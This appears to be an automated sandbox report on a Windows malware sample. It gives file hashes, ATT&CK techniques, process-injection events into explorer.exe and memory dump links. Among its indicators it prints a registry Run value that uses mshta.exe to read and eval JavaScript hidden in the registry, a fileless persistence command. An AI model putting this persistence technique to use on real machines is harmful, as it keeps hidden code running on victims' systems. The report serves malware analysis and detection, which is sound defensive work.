1bf6e25f5655dd96b13058e02e864b038a96cb2ddfb805c551b3df33c5782dae

General

Target

1bf6e25f5655dd96b13058e02e864b038a96cb2ddfb805c551b3df33c5782dae.exe
Size

392KB
MD5

57593773a392df0619b0052695fb5e6f
SHA1

376dc24d2cadd9f7c2ba6e639d929c4133a19a78
SHA256

1bf6e25f5655dd96b13058e02e864b038a96cb2ddfb805c551b3df33c5782dae
SHA512

3e9207e778ce2d7ec6e09cab6c6f399cf6d4b5a2fed1c853cbc2755e7b33bbef611bad60befba409f775b6d6ca86be6b9dee0d7d6627a6057da023f1f773a199

Score

6^/10

persistence

Malware Config

Signatures

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftUpdates = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1bf6e25f5655dd96b13058e02e864b038a96cb2ddfb805c551b3df33c5782dae.exe"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\ChromeApplication = "C:\\Windows\\system32\\mshta.exe javascript:x=new%20ActiveXObject(\"wscript.shell\");v=x.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\SMSvcHost\\\\ComponentID\");eval(v);"	explorer.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1756 set thread context of 2000	1756	1bf6e25f5655dd96b13058e02e864b038a96cb2ddfb805c551b3df33c5782dae.exe	26
PID 2000 set thread context of 1220	2000	1bf6e25f5655dd96b13058e02e864b038a96cb2ddfb805c551b3df33c5782dae.exe	30

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
2000	1bf6e25f5655dd96b13058e02e864b038a96cb2ddfb805c551b3df33c5782dae.exe
1220	explorer.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1220	explorer.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1220	explorer.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 1756 wrote to memory of 2000	1756	1bf6e25f5655dd96b13058e02e864b038a96cb2ddfb805c551b3df33c5782dae.exe	26
PID 1756 wrote to memory of 2000	1756	1bf6e25f5655dd96b13058e02e864b038a96cb2ddfb805c551b3df33c5782dae.exe	26
PID 1756 wrote to memory of 2000	1756	1bf6e25f5655dd96b13058e02e864b038a96cb2ddfb805c551b3df33c5782dae.exe	26
PID 1756 wrote to memory of 2000	1756	1bf6e25f5655dd96b13058e02e864b038a96cb2ddfb805c551b3df33c5782dae.exe	26
PID 1756 wrote to memory of 2000	1756	1bf6e25f5655dd96b13058e02e864b038a96cb2ddfb805c551b3df33c5782dae.exe	26
PID 1756 wrote to memory of 2000	1756	1bf6e25f5655dd96b13058e02e864b038a96cb2ddfb805c551b3df33c5782dae.exe	26
PID 1756 wrote to memory of 2000	1756	1bf6e25f5655dd96b13058e02e864b038a96cb2ddfb805c551b3df33c5782dae.exe	26
PID 1756 wrote to memory of 2000	1756	1bf6e25f5655dd96b13058e02e864b038a96cb2ddfb805c551b3df33c5782dae.exe	26
PID 1756 wrote to memory of 2000	1756	1bf6e25f5655dd96b13058e02e864b038a96cb2ddfb805c551b3df33c5782dae.exe	26
PID 1756 wrote to memory of 2000	1756	1bf6e25f5655dd96b13058e02e864b038a96cb2ddfb805c551b3df33c5782dae.exe	26
PID 1756 wrote to memory of 2000	1756	1bf6e25f5655dd96b13058e02e864b038a96cb2ddfb805c551b3df33c5782dae.exe	26
PID 1756 wrote to memory of 2000	1756	1bf6e25f5655dd96b13058e02e864b038a96cb2ddfb805c551b3df33c5782dae.exe	26
PID 1756 wrote to memory of 2000	1756	1bf6e25f5655dd96b13058e02e864b038a96cb2ddfb805c551b3df33c5782dae.exe	26
PID 1756 wrote to memory of 2000	1756	1bf6e25f5655dd96b13058e02e864b038a96cb2ddfb805c551b3df33c5782dae.exe	26
PID 2000 wrote to memory of 1220	2000	1bf6e25f5655dd96b13058e02e864b038a96cb2ddfb805c551b3df33c5782dae.exe	30
PID 2000 wrote to memory of 1220	2000	1bf6e25f5655dd96b13058e02e864b038a96cb2ddfb805c551b3df33c5782dae.exe	30
PID 2000 wrote to memory of 1220	2000	1bf6e25f5655dd96b13058e02e864b038a96cb2ddfb805c551b3df33c5782dae.exe	30
PID 2000 wrote to memory of 1220	2000	1bf6e25f5655dd96b13058e02e864b038a96cb2ddfb805c551b3df33c5782dae.exe	30

C:\Users\Admin\AppData\Local\Temp\1bf6e25f5655dd96b13058e02e864b038a96cb2ddfb805c551b3df33c5782dae.exe
"C:\Users\Admin\AppData\Local\Temp\1bf6e25f5655dd96b13058e02e864b038a96cb2ddfb805c551b3df33c5782dae.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1756
- C:\Users\Admin\AppData\Local\Temp\1bf6e25f5655dd96b13058e02e864b038a96cb2ddfb805c551b3df33c5782dae.exe
  "C:\Users\Admin\AppData\Local\Temp\1bf6e25f5655dd96b13058e02e864b038a96cb2ddfb805c551b3df33c5782dae.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:2000
- - C:\Windows\SysWOW64\explorer.exe
    "C:\Windows\SysWOW64\explorer.exe"
    3⤵
    - Adds Run key to start application
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    PID:1220

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1220-2-0x0000000000080000-0x000000000008F000-memory.dmp

Filesize
60KB

Download
memory/1248-5-0x0000000003880000-0x0000000003885000-memory.dmp

Filesize
20KB

Download
memory/2000-0-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download

Analysis

Sharing